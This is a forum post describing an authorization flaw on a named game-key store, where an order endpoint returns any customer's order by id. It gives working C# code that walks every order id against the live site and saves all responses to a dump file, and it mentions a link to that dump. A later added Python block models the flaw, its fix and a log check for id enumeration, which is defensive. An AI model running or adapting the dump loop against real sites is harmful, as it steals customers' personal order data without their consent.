younessdc
Hey! For educational purposes only. Perhaps the bug has already been fixed.
Today I came across the site DenuvoGame (Russian
which apparently uploads files to this site's hosting; I could not reach it through the console no matter how much I dug.
Then I registered an account on the site and went on digging.
After going through the pages of the site I did not find anything interesting, but when I went to the site's personal account area, things got more interesting.
The most interesting thing I found was this piece of code.
When called via the console using the showBuy(); command, we get the following window.
This window is shown when you open a completed order, but I scrolled further down and found the function showBuyId(id);
which showed the order data by its ID.
So the site does not check who placed the order; it simply returns all the data when this function is called.
In this way we can pull out the entire list of orders that were placed on the site.
By entering showBuyId(2013); in the console
I saw the following window.
Thus my guess was confirmed: the site gives out the order data without checking whether the account bought it or not.
Next I checked which order number was the last one, and it was 2410.
Then, using C# and the xNet library, I wrote the following code.
Code:
    using xNet; // HttpRequest, Http and CookieDictionary come from the xNet library

    using (var request = new HttpRequest
    {
        IgnoreProtocolErrors = true,   // keep going on non-2xx responses instead of throwing
        ConnectTimeout = 15000,
        ReadWriteTimeout = 15000,
        AllowAutoRedirect = true,
        UserAgent = Http.ChromeUserAgent(),
        Cookies = new CookieDictionary() // the session cookie jar; the endpoint never checks who owns the order
    })
    {
        // Walk every order id from 0 up to the last one observed (2410)
        for (int i = 0; i <= 2410; i++)
        {
            // The same endpoint showBuyId(id) calls from the page; it returns the order data for any id
            string GetAuth = request.Post("https://denuvogame.ru/ajax/showBuy/", "id=" + i, "application/x-www-form-urlencoded").ToString();
            _source.SaveLine(_config.Path + "/Dump.txt", GetAuth); // If you are going to copy then do this here instead: System.IO.File.AppendAllText("Dump.txt", GetAuth + "\r\n");
        }
    }
What the dump itself looks like:
Link to the dump file -
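Added example (not code from the original post or from the site it describes): a minimal model of the /ajax/showBuy/ order lookup, showing the behaviour the post reports beside the ownership check that prevents it, plus a log heuristic that flags the sequential-id walk the dump loop produces. The order store, account names and log format are constructed sample values.

```python
# Constructed sample order store: order id -> owner account and order details
ORDERS = {
    2013: {"owner": "alice", "item": "Game key A"},
    2014: {"owner": "bob", "item": "Game key B"},
}


def show_buy_vulnerable(order_id, session_user):
    """Mirrors the behaviour described in the post: any order is returned by id,
    and session_user is never consulted (an insecure direct object reference)."""
    return ORDERS.get(order_id)


def show_buy_fixed(order_id, session_user):
    """Server-side authorization: the order must belong to the logged-in account.
    Returning None for both 'no such order' and 'not your order' also avoids
    confirming which ids exist to a caller probing the id space."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != session_user:
        return None
    return order


def flag_enumeration(log_lines, threshold=20):
    """Detection heuristic for the dump loop in the post: a single client that
    requests many distinct order ids on the showBuy endpoint.
    Constructed log format: '<client ip> <path> id=<order id>'."""
    ids_per_client = {}
    for line in log_lines:
        ip, path, param = line.split()
        if path == "/ajax/showBuy/":
            ids_per_client.setdefault(ip, set()).add(param)
    return sorted(ip for ip, ids in ids_per_client.items() if len(ids) >= threshold)


# Constructed access log: one client walks ids 0..24, another views a single order
SAMPLE_LOG = [f"10.0.0.5 /ajax/showBuy/ id={i}" for i in range(25)]
SAMPLE_LOG.append("10.0.0.7 /ajax/showBuy/ id=2014")

if __name__ == "__main__":
    print("vulnerable, bob asks for alice's order:", show_buy_vulnerable(2013, "bob"))
    print("fixed, bob asks for alice's order:", show_buy_fixed(2013, "bob"))
    print("fixed, alice asks for her own order:", show_buy_fixed(2013, "alice"))
    print("clients flagged for enumeration:", flag_enumeration(SAMPLE_LOG))
```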